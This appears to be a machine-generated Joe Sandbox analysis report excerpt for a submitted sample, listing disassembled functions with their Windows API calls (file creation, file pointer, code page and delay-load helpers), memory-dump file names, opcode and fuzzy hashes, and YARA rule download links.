                                        • Instruction ID: c5dc84f0bb09ad69ee207228c7aee414995be7eb5b8d14f85235adbb1f453b81
                                        • Opcode Fuzzy Hash: 7c9463dbd6beb6c1d9e82d29403a73805516929f4207136897c5d3927b46b987
                                        • Instruction Fuzzy Hash: CBA002D51F9181BC750952535D16D7B011DC4C6B51371552DF816C44D169906C551875
                                        Function 002EE2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: 9f3e17ee33bb4f7231ceab769a24435a1aef189b5cf345999ee25b89539da916
                                        • Instruction ID: c5dc84f0bb09ad69ee207228c7aee414995be7eb5b8d14f85235adbb1f453b81
                                        • Opcode Fuzzy Hash: 9f3e17ee33bb4f7231ceab769a24435a1aef189b5cf345999ee25b89539da916
                                        • Instruction Fuzzy Hash: CBA002D51F9181BC750952535D16D7B011DC4C6B51371552DF816C44D169906C551875
                                        Function 002EE2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: e4701f43bb1571906dcc0821375ac8a573a258f070c6132d71653ba2dac310d1
                                        • Instruction ID: c5dc84f0bb09ad69ee207228c7aee414995be7eb5b8d14f85235adbb1f453b81
                                        • Opcode Fuzzy Hash: e4701f43bb1571906dcc0821375ac8a573a258f070c6132d71653ba2dac310d1
                                        • Instruction Fuzzy Hash: CBA002D51F9181BC750952535D16D7B011DC4C6B51371552DF816C44D169906C551875
                                        Function 002EE569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE51F
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: PDu<.
                                        • API String ID: 1269201914-3708720079
                                        • Opcode ID: 09287b4687705b1d317d769f2b820e7a2b1bf688f81d69b8b710ae166728fc0e
                                        • Instruction ID: 8fb8528ec882d31bed06f44636133f123d9007136ee5a784c913186855fedc6b
                                        • Opcode Fuzzy Hash: 09287b4687705b1d317d769f2b820e7a2b1bf688f81d69b8b710ae166728fc0e
                                        • Instruction Fuzzy Hash: AAA011C22FA882BCB808A2022C22C3B020EC0C2F203F2AA2EF802800C0A8800C280830
                                        Function 002EE573 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE580
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Fjun.
                                        • API String ID: 1269201914-344076011
                                        • Opcode ID: e757c97daa9918dfb4b8d4ee33d34295e8a72870d5cf982331e842a56ff5e67e
                                        • Instruction ID: a498968f763d13764aab7ffa16e63babea6d978a3bc3fdceb5b690a93c3a8fe4
                                        • Opcode Fuzzy Hash: e757c97daa9918dfb4b8d4ee33d34295e8a72870d5cf982331e842a56ff5e67e
                                        • Instruction Fuzzy Hash: 3FA011C22FA0803CB828A3A22C23C3B020EC0C0B223B2A32EF800800C0A88008280830
                                        Function 002EE541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE51F
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: PDu<.
                                        • API String ID: 1269201914-3708720079
                                        • Opcode ID: f9b5471b08f32ebf489b7246c7f5943d440f34a7fadf0fc566fbeacdbe668304
                                        • Instruction ID: 8fb8528ec882d31bed06f44636133f123d9007136ee5a784c913186855fedc6b
                                        • Opcode Fuzzy Hash: f9b5471b08f32ebf489b7246c7f5943d440f34a7fadf0fc566fbeacdbe668304
                                        • Instruction Fuzzy Hash: AAA011C22FA882BCB808A2022C22C3B020EC0C2F203F2AA2EF802800C0A8800C280830
                                        Function 002EE55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE51F
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: PDu<.
                                        • API String ID: 1269201914-3708720079
                                        • Opcode ID: 7c520962794c7dd252054766f6b2b1c0d88b5bb96f9413fbdbf92b4c5400c96e
                                        • Instruction ID: 8fb8528ec882d31bed06f44636133f123d9007136ee5a784c913186855fedc6b
                                        • Opcode Fuzzy Hash: 7c520962794c7dd252054766f6b2b1c0d88b5bb96f9413fbdbf92b4c5400c96e
                                        • Instruction Fuzzy Hash: AAA011C22FA882BCB808A2022C22C3B020EC0C2F203F2AA2EF802800C0A8800C280830
                                        Function 002EE555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE51F
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: PDu<.
                                        • API String ID: 1269201914-3708720079
                                        • Opcode ID: da5f0e38999f4966547eec9b0b80f0d735e830606f81081cb9bdb7d38bbfce75
                                        • Instruction ID: 8fb8528ec882d31bed06f44636133f123d9007136ee5a784c913186855fedc6b
                                        • Opcode Fuzzy Hash: da5f0e38999f4966547eec9b0b80f0d735e830606f81081cb9bdb7d38bbfce75
                                        • Instruction Fuzzy Hash: AAA011C22FA882BCB808A2022C22C3B020EC0C2F203F2AA2EF802800C0A8800C280830
                                        Function 002EE5A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE580
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Fjun.
                                        • API String ID: 1269201914-344076011
                                        • Opcode ID: b83d0ffcf0460c0ab6d5cff21e17fec18846f385098d778def33dd82850cc597
                                        • Instruction ID: 9082808242f84f26782237e95254873f7918c35d572009b28540bcfebe05ee8a
                                        • Opcode Fuzzy Hash: b83d0ffcf0460c0ab6d5cff21e17fec18846f385098d778def33dd82850cc597
                                        • Instruction Fuzzy Hash: 4BA012C11F90817C741453521C13C37010DC0C0B103B2561DF401800C0688008280830
                                        Function 002EE58E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE580
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Fjun.
                                        • API String ID: 1269201914-344076011
                                        • Opcode ID: 100baf399099f2add929eb2b9071658e22f9e1c5fd2877adb4330a18de486038
                                        • Instruction ID: 9082808242f84f26782237e95254873f7918c35d572009b28540bcfebe05ee8a
                                        • Opcode Fuzzy Hash: 100baf399099f2add929eb2b9071658e22f9e1c5fd2877adb4330a18de486038
                                        • Instruction Fuzzy Hash: 4BA012C11F90817C741453521C13C37010DC0C0B103B2561DF401800C0688008280830
                                        Function 002FBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002FB7BB: GetOEMCP.KERNEL32(00000000,?,?,002FBA44,?), ref: 002FB7E6
                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,002FBA89,?,00000000), ref: 002FBC64
                                        • GetCPInfo.KERNEL32(00000000,002FBA89,?,?,?,002FBA89,?,00000000), ref: 002FBC77
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: CodeInfoPageValid
                                        • String ID:
                                        • API String ID: 546120528-0
                                        • Opcode ID: 962b7f78d80f01de15267590ae316137436aa2638a396c55ed0964d907fbb863
                                        • Instruction ID: 182ed7bfce5b8d06a1b38a807d3f4a21bbc0304f9da78e6606dda70a25c3258f
                                        • Opcode Fuzzy Hash: 962b7f78d80f01de15267590ae316137436aa2638a396c55ed0964d907fbb863
                                        • Instruction Fuzzy Hash: 40517770A2024E9EDB239F31C8916BBFBE8EF45380F24447ED2928B651D7349915CB91
                                        Function 002D9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,002D9A50,?,?,00000000,?,?,002D8CBC,?), ref: 002D9BAB
                                        • GetLastError.KERNEL32(?,00000000,002D8411,-00009570,00000000,000007F3), ref: 002D9BB6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID:
                                        • API String ID: 2976181284-0
                                        • Opcode ID: 3dca90d2eb48a9bfb04e1f59a257ced0d7c677cc9b990dee45844722420963e1
                                        • Instruction ID: e055c70a51d6a09b827460869be7ab74aac9c0b8d7712d0ab793c8abda08b7b0
                                        • Opcode Fuzzy Hash: 3dca90d2eb48a9bfb04e1f59a257ced0d7c677cc9b990dee45844722420963e1
                                        • Instruction Fuzzy Hash: 2E41EF316243428FDB24DF15E58456AB7E9FFD5328F168A2FF88583360D7B0EC948A51
                                        Function 002D1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002D1E55
                                          • Part of subcall function 002D3BBA: __EH_prolog.LIBCMT ref: 002D3BBF
                                        • _wcslen.LIBCMT ref: 002D1EFD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: H_prolog$_wcslen
                                        • String ID:
                                        • API String ID: 2838827086-0
                                        • Opcode ID: c1eb432fa18ad5b073195277e2e95c5b21111c6ca34f1515872e7aec7fc5fa86
                                        • Instruction ID: e542f1d6d69bf9ee05bc2f9d4282be6855dd8ef16973e748b2c22bfc2f381a56
                                        • Opcode Fuzzy Hash: c1eb432fa18ad5b073195277e2e95c5b21111c6ca34f1515872e7aec7fc5fa86
                                        • Instruction Fuzzy Hash: 33313871964209AEDF15DF99C945AEEBBF6AF08304F2000AAE845A7751C7325E20CF60
                                        Function 002D9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,002D73BC,?,?,?,00000000), ref: 002D9DBC
                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 002D9E70
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: File$BuffersFlushTime
                                        • String ID:
                                        • API String ID: 1392018926-0
                                        • Opcode ID: cef1779beb1c803ab598f2d325175e4147e756d3d5c983e4e5d0e9c9abc15ec5
                                        • Instruction ID: 9055666ebf2267267f44b2632a5ef99810fef723032d21f04ebe822dae32d2a2
                                        • Opcode Fuzzy Hash: cef1779beb1c803ab598f2d325175e4147e756d3d5c983e4e5d0e9c9abc15ec5
                                        • Instruction Fuzzy Hash: 9621F2312692869BC714DF35C491AABBBE8AF55304F08495EF4C583281D338DD6CCB61
                                        Function 002D966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,002D9F27,?,?,002D771A), ref: 002D96E6
                                        • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,002D9F27,?,?,002D771A), ref: 002D9716
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 6dfba46af3ab5e82bc1587944633c887df40de67ef2687774ebb669abaf044e7
                                        • Instruction ID: 577d29fcabdfbc3da6af2c0ceff262bb5ecf582c1693caa6283182f753bb8ad1
                                        • Opcode Fuzzy Hash: 6dfba46af3ab5e82bc1587944633c887df40de67ef2687774ebb669abaf044e7
                                        • Instruction Fuzzy Hash: 2D21C1B11243456FE3308E65CC89FA7B7DCEB49324F500A1AF996C22D1C7B4AC948B71
                                        Function 002D9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 002D9EC7
                                        • GetLastError.KERNEL32 ref: 002D9ED4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID:
                                        • API String ID: 2976181284-0
                                        • Opcode ID: a59fe499306e45cbebdeb37f052718cf5d531d28062999447f5d28582e162c0b
                                        • Instruction ID: 57f3393b1785288f813ba586228cb38ba5b332f62fc071752ba9f352aaf34be2
                                        • Opcode Fuzzy Hash: a59fe499306e45cbebdeb37f052718cf5d531d28062999447f5d28582e162c0b
                                        • Instruction Fuzzy Hash: A511E530620705ABD725CA28C844BA6B7EDAB49360F604A2BF553D27D0D7B0EDD5C760
                                        Function 002F8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 002F8E75
                                          • Part of subcall function 002F8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002FCA2C,00000000,?,002F6CBE,?,00000008,?,002F91E0,?,?,?), ref: 002F8E38
